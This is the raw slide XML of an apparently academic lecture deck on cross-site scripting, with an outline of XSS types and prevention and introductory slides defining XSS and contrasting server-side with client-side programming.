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4" r:id="rId6"/>
    <p:sldId id="402" r:id="rId7"/>
    <p:sldId id="403" r:id="rId8"/>
    <p:sldId id="313" r:id="rId9"/>
    <p:sldId id="415" r:id="rId10"/>
    <p:sldId id="404" r:id="rId11"/>
    <p:sldId id="406" r:id="rId12"/>
    <p:sldId id="405" r:id="rId13"/>
    <p:sldId id="396" r:id="rId14"/>
    <p:sldId id="408" r:id="rId15"/>
    <p:sldId id="407" r:id="rId16"/>
    <p:sldId id="409" r:id="rId17"/>
    <p:sldId id="410" r:id="rId18"/>
    <p:sldId id="411" r:id="rId19"/>
    <p:sldId id="413" r:id="rId20"/>
    <p:sldId id="417" r:id="rId21"/>
    <p:sldId id="367" r:id="rId22"/>
    <p:sldId id="418" r:id="rId23"/>
    <p:sldId id="369" r:id="rId24"/>
    <p:sldId id="440" r:id="rId25"/>
    <p:sldId id="432" r:id="rId26"/>
    <p:sldId id="434" r:id="rId27"/>
    <p:sldId id="435" r:id="rId28"/>
    <p:sldId id="370" r:id="rId29"/>
    <p:sldId id="441" r:id="rId30"/>
    <p:sldId id="368" r:id="rId31"/>
    <p:sldId id="419" r:id="rId32"/>
    <p:sldId id="420" r:id="rId33"/>
    <p:sldId id="433" r:id="rId34"/>
    <p:sldId id="421" r:id="rId35"/>
    <p:sldId id="382" r:id="rId36"/>
    <p:sldId id="371" r:id="rId37"/>
    <p:sldId id="442" r:id="rId38"/>
    <p:sldId id="436" r:id="rId39"/>
    <p:sldId id="437" r:id="rId40"/>
    <p:sldId id="372" r:id="rId41"/>
    <p:sldId id="373" r:id="rId42"/>
    <p:sldId id="443" r:id="rId43"/>
    <p:sldId id="374" r:id="rId44"/>
    <p:sldId id="375" r:id="rId45"/>
    <p:sldId id="376" r:id="rId46"/>
    <p:sldId id="377" r:id="rId47"/>
    <p:sldId id="379" r:id="rId48"/>
    <p:sldId id="380" r:id="rId49"/>
    <p:sldId id="445" r:id="rId5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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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3/29/2023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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.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12"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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.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2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.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png"/></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png"/></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png"/></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png"/></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46774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dirty="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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9518"/>
                </a:solidFill>
                <a:latin typeface="Tajawal Medium" panose="00000600000000000000"/>
                <a:ea typeface="Tajawal Medium" panose="00000600000000000000"/>
                <a:cs typeface="Tajawal Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Lecture 9</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14029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Outlines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0" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACA1087-41F5-309E-7FD0-A686BF642721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="832644" y="1674470"/>
            <a:ext cx="7050087"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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>What is Cross site scripting ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Server-side and Client-side programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Who is affected by XSS? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS categories </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Types of XSS Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="1" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Stored based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="1" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Reflected based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="1" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>DOM based </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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AC668E4-E9FD-7BCD-3BA6-A031A71B5889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652463" y="1806675"/>
            <a:ext cx="7190791" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>What is Cross site scripting ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cross site scripting is a cyberattack method that involves running malicious code as part of a vulnerable web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unlike other attack vectors like SQL injections, Cross site scripting  does not target the application directly—it primarily targets the user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417247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3661D22-4CF4-8B76-D937-09B3B798F4C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263650" y="1734622"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Server-side and Client-side programming </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{436A07FF-2426-E58B-7D66-9A38D793E978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312443" y="2468750"/>
            <a:ext cx="6228182" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server-side programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Client-side programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="What are the differences between client-side and server-side programming  languages?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF57950-8D4D-9D22-686F-F65478AE0DB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92850" y="2337936"/>
            <a:ext cx="2977728" cy="21543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sics - a user perspective on server-side scripting | EBS Integrator">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A9463B-4083-D83C-41D5-B80299B113D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51102" y="3515126"/>
            <a:ext cx="4094955" cy="2293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735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86C92AF-0FE0-B3B7-882A-2AC4217F7D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263650" y="1734622"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Server-side and Client-side programming </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E507FB-4CB2-FFCB-7C9F-0B8E9B7F7575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652463" y="2606576"/>
            <a:ext cx="7136816" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Server-side programming is writing code that runs on the server, using languages supported by the server (such as Java, PHP, C#; it is possible to write code that executes on the server-side in JavaScript). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A407FA59-5A87-6326-5AF6-A4C4A2C4B2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357398" y="3748743"/>
            <a:ext cx="4450701" cy="296929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86C92AF-0FE0-B3B7-882A-2AC4217F7D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263650" y="1734622"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Server-side and Client-side programming </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E507FB-4CB2-FFCB-7C9F-0B8E9B7F7575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652463" y="2606576"/>
            <a:ext cx="7136816" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Client-side programming is writing code that will run on the client and is done in languages that can be executed by the browser, such as JavaScript.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4199595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211CA5E-2F4E-662D-48BF-D10B02358085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460081" y="2103954"/>
            <a:ext cx="6228182" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser, in the user's machine, runs the code, and it's mainly done in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, flash, etc. This code must run in a variety of browsers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FEEC97-4B04-4727-C3E6-95F710691337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561097" y="1734622"/>
            <a:ext cx="6228182" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB61647-D4FE-4E5C-B563-B7B8411CCFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652463" y="3078877"/>
            <a:ext cx="7368591" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Its main tasks are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>validating input (Validation must be done in the server. A redundant validation in the client could be used to avoid server calls when speed is very critical.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>animation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manipulating UI elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>applying styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some calculations are done when you don't want the page to refresh so often</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014406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B26C123E-56BB-5B22-0DF3-52F0752B4578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209822" y="2025748"/>
            <a:ext cx="6895953" cy="2555583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting, or XSS (not to be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cascading Style Sheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>), allows attackers to inject client-side script in a web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>The attacker injects script, such as JavaScript, VBScript,  ActiveX, HTML, or Flash into an application to try to get access to sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E47D0B-BF0B-A03D-7CFE-645985FA9ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512678" y="1458355"/>
            <a:ext cx="6228182" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>What is Cross-Site Scripting?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673400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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4422522-87AF-B45B-8DA3-39EA445DCB93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164222" y="1707758"/>
            <a:ext cx="8242663" cy="3948178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ar-SA" sz="2600" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>is one of the most common application level attacks that hackers use to sneak into web applications today.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>Cross site scripting  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inject client-side script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>into Web pages viewed by other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014330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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40274A87-B6FA-8A4C-BE96-DE9CA002AB96}"/>
